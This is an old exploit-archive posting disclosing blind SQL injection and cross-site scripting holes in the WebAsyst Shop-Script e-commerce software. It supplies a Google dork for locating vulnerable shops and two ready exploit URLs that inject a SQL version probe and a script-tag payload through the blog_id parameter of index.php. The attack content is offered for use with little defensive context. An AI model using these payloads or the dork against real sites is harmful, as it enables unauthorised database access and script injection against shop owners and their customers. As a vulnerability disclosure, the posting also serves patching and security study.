webasyst shop-script - Blind SQL Injection / Cross-Site Scripting

EDB-ID:

9092

CVE:

N/A

Author:

Vrs-hCk

Type:

webapps

Platform:

PHP

Published:

2009-07-09

 =============================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : WebAsyst Shop-Script
 Vendor   : http://www.webasyst.net
 
 Date     : 03 July 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 =============================================================================================

 [-] Google Dork

     "Powered by WebAsyst Shop-Script"

 [-] Vulnerable (Blind SQL/XSS)

     index.php

 [-] Exploit (Blind SQL)

     http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null

 [-] Exploit (XSS)

     http://[site]/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>

 =============================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 =============================================================================================

# milw0rm.com [2009-07-09]